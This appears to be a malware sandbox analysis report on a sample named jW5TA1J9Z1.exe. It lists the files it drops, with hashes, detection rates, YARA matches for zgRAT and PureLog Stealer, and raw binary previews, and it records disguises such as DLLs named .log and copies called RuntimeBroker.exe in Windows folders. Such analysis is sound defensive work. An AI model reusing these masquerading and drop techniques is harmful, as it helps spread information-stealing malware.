                                                                    • Filename: webWin.exe, Detection: malicious, Browse
                                                                    • Filename: W1nner client.exe, Detection: malicious, Browse
                                                                    • Filename: htxERaJl1W.exe, Detection: malicious, Browse
                                                                    • Filename: Injector.exe, Detection: malicious, Browse
                                                                    • Filename: WWAHost.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                    C:\Users\user\Desktop\LzHTfErB.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):23552
                                                                    Entropy (8bit):5.519109060441589
                                                                    Encrypted:false
                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\UiajPhxi.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):33792
                                                                    Entropy (8bit):5.541771649974822
                                                                    Encrypted:false
                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\bakRRaCx.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):23552
                                                                    Entropy (8bit):5.519109060441589
                                                                    Encrypted:false
                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\dMjZyaMQ.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):69632
                                                                    Entropy (8bit):5.932541123129161
                                                                    Encrypted:false
                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                    C:\Users\user\Desktop\kDsGBTSe.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):33792
                                                                    Entropy (8bit):5.541771649974822
                                                                    Encrypted:false
                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\ksQGNTNC.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):32256
                                                                    Entropy (8bit):5.631194486392901
                                                                    Encrypted:false
                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\oANPimHy.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):85504
                                                                    Entropy (8bit):5.8769270258874755
                                                                    Encrypted:false
                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                    C:\Users\user\Desktop\umLWkwXM.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):69632
                                                                    Entropy (8bit):5.932541123129161
                                                                    Encrypted:false
                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                    C:\Users\user\Desktop\vaQeWJTK.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):32256
                                                                    Entropy (8bit):5.631194486392901
                                                                    Encrypted:false
                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Windows\AppReadiness\9e8d7a4ca61bd9

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):66
                                                                    Entropy (8bit):5.146148475189603
                                                                    Encrypted:false
                                                                    SSDEEP:3:TWgiJowV8JPbHLUfcb8Yf16s:Cxog81rUfcjfks
                                                                    MD5:08C87485154DEC239BF91AB6768AB292
                                                                    SHA1:5D428D306B666783A620C741D6E2347267D9EF26
                                                                    SHA-256:5D2DD25B2AB87F8B16E6EE8BB78075FA57C5E95C10996C2026BA14AB8F2357AD
                                                                    SHA-512:060B344C487DEB3195021BF424D2C37A46E8E335CF883D8CEF7A600C3B3C7D8445763FC1AE5B64413369CA99ADA56235A33D0F0856BFA2FB03F6C434B604E958
                                                                    Malicious:false
                                                                    Preview:2WUsJn4o07i5gAgslpzyBCqUp3Q5XUxcEoOEUW5srOJzy1YHvBYwN7Czp9CPW9RgKF

                                                                    C:\Windows\AppReadiness\RuntimeBroker.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1960448
                                                                    Entropy (8bit):7.550221219335871
                                                                    Encrypted:false
                                                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\AppReadiness\RuntimeBroker.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\AppReadiness\RuntimeBroker.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\AppReadiness\RuntimeBroker.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\AppReadiness\RuntimeBroker.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 74%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......p.......................T........................................0..........(.... ........8........E....9...............84...*(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{l...:....& ....8........0.......... ........8........E....-...............9...8(...~....:)... ........8.......... ....8....r...ps....z*~....(O... .... .... ....s....~....(S....... ....~....{h...:n...& ....8c.......~....(W...~....([... ....?.... ....~....{....:-...& ....8".....(.

                                                                    C:\Windows\AppReadiness\RuntimeBroker.exe:Zone.Identifier

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                    C:\Windows\DiagTrack\9e8d7a4ca61bd9

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with very long lines (950), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):950
                                                                    Entropy (8bit):5.910773020858544
                                                                    Encrypted:false
                                                                    SSDEEP:24:d3z9gBlYbQEP8rVG705RJ9IpLfLOipLRQaAUFus836wAo4ZC9mO:d3zqYbQEk15RJ9I1fKiZOU0so62MqmO
                                                                    MD5:10F15971CACB930C68ADC28CEB65C273
                                                                    SHA1:AD055C7085E45C0A5D7AE95F9D10BF658333C0B2
                                                                    SHA-256:CC40F4FF1E5C768C1FACD59C17DF44E159C5705D0E37CF75C629F87D61A1AD38
                                                                    SHA-512:2BDFEFDBE18FFC49A8A57B6A0173D5130CBA5C1D15910182039CC60D3C93D66EEE0B691DF487205F558E015098DF5F6D5AB0331F0C7ED24D28D88004B4866973
                                                                    Malicious:false
                                                                    Preview:dIit9sVXaG3esGdIBH0D3duXBj6SzUxHhnFoQD6RE1eZEX2zPUptQJD9XKrawDhFTw7FBy17Ki8C8VSoqHCfpE0XjFQFWffBUZGSZxyadrirKBAC2DupACZP5jf5ivloD7rjPAO2TlB8fJNiENNTuzAS90W0S22rG3nNTbx1y2WYAbtwW60UiS3N6ZkYnYjatT1mf9OnaWe2dmRiHkdWChJy9aR40YNaT5pqjHQWrM4MxBtUHCRD4NYLKDmFsUxBIEji6l89TGozn7A7q6wyHKfFheggeLoWZ2DtcLXgDRtyiihMDoYvi847idBcEcfHcRav3QffjPu0arh86Uc0x2ya8GL9K5clwlVQIwSwJ3MSNDg15Cgu9pUkd9xxFgUoxJDzVRzJBqq3qfN4jTDHZrlHQvwJ9fqmiifE9rfoNWtS8b38v2NwcNPFh6ikepKfADUIAJ42yY4C8TIz1yXGR4KVTZgDJ5KhMNS4Gv7m8V7DSMHOxtspRDOG38zkm1t3OW0vAOsF0uI66GDGSRPZMePI9MAH6XAHmEz6VWNjAmyg5RJw5sSVmTqtGsvyNkJduBU1RGu6DpZjqtMrCOMOFpeSXFznkZVadVw47Rfy7VR63HDXfDv9Y4YFgBdMRGWoU9FV7SuusXQtYiYQCcHgnWBi6qY5xTh19ml4BsaNTAQBoor7mNKz8zB87gYQ3y7ZzZuv6ePTB4MmFA4S8aTkIs2Jln7eUJTeD0LP46AI80xEmY26mGRdfWQHhkKThu91ksiOzpXCZLmS4xhMuA2N209rkEsUvrlN06e40oH7sPDUu8MtD7ig2v9ts1ov6CQsjYb8TmWG34enxp7l18RyJEVF6uM8AWAq8UuVgNaalbn7QW6D4C38vcjfDWCiaXGh4yoc5lEnh1MrbXykxJE7cC5fvPRKL19NVGDcreIS8Pa4P1DphcvRTI

                                                                    C:\Windows\DiagTrack\RuntimeBroker.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1960448
                                                                    Entropy (8bit):7.550221219335871
                                                                    Encrypted:false
                                                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 74%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......p.......................T........................................0..........(.... ........8........E....9...............84...*(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{l...:....& ....8........0.......... ........8........E....-...............9...8(...~....:)... ........8.......... ....8....r...ps....z*~....(O... .... .... ....s....~....(S....... ....~....{h...:n...& ....8c.......~....(W...~....([... ....?.... ....~....{....:-...& ....8".....(.

                                                                    C:\Windows\DiagTrack\RuntimeBroker.exe:Zone.Identifier

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                    C:\Windows\ServiceProfiles\3b1a2dfabaeac3

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with very long lines (673), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):673
                                                                    Entropy (8bit):5.883158136382871
                                                                    Encrypted:false
                                                                    SSDEEP:12:Fbvr+ImwOkqYVUlSPI/UHnvwlN4I621fJP3yKpsiEWjopqzoRi:Jvrfm6vn6UHnol421R/e0oc
                                                                    MD5:DF7E720456FC44AB99723A395E2675C8
                                                                    SHA1:E44C40E8DFFC1B23DB40A637168045B7BC9455E5
                                                                    SHA-256:D6EFB58BD65A8FCB417E0BB82819D4E99729C45C300FEF17BA8DE0A1750E26B3
                                                                    SHA-512:3A9B6E78778A95A2566ADC105D73EEFBD97DB2782ACF7D50D392FF3BFD4587E4F5338B13D89E81C6508D167C2BB1BAE7E4EB2CF0EB5C3051D379EC9201ECFB28
                                                                    Malicious:false
                                                                    Preview:U3cq19VVUW2TAv9MlAP3LlmtGs4MBLiixc8ExuCQfsVLjbQhJ1Q23wdsRsjIFJTIxUfix5Z189YdQbJobWCJ5qpA8PxEK4LWYMXP5suOcY43YAczi4rsGKNHofjiIUrExBFDD4stlyrgvvl8w7fPMcQO8QkaIMGHr0FX4ZwoL7HRdqW33lvKyb1Vv1ExTSlZsjz5pODXL1DPV8uS4rhha5SP9umDU9U3Wrj30bNohY97Xl9wGw2lvD9xQj55mACMgK3nZ1bde2AB5V2Xuz7iGtISswnRfSChWxbMsWXPUZH2D715riKwCdFxCl4mNK8M0dpH4ppYbsNrmQOu4rk7HPe2snKHbuBKb4BkStBB2wUUPYKwWKsfkBEk8wZQfi6rqDPrOncKqjEV4JmTdYuRCfkazblfUvfUznoMIdisrhzB6tqzJFxGxpoKcz1wC605DtfQfaL90BjeqjdGuwVO7YgK8dtSlvqur37NOZUt4xQwFKe3WvCPlm7oMUSBq2YFUyxxlP2VclTKIuFy9z60tbJE5TA3HSDBZLbQWqSG3qx9SxfcPdC06hW3ps2SP8OKiSu7TybShz6CnKwHxinnPME1zhlny914cmaACiIbBtSHlTQe6uerVk4WN3HwNyeh8CkAuvEOZLlf37QfRGqEfJi1sEwJbWNNP

                                                                    C:\Windows\ServiceProfiles\MQYzEFytUKABjmoxvNTPTwUrcL.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1960448
                                                                    Entropy (8bit):7.550221219335871
                                                                    Encrypted:false
                                                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 74%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......p.......................T........................................0..........(.... ........8........E....9...............84...*(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{l...:....& ....8........0.......... ........8........E....-...............9...8(...~....:)... ........8.......... ....8....r...ps....z*~....(O... .... .... ....s....~....(S....... ....~....{h...:n...& ....8c.......~....(W...~....([... ....?.... ....~....{....:-...& ....8".....(.

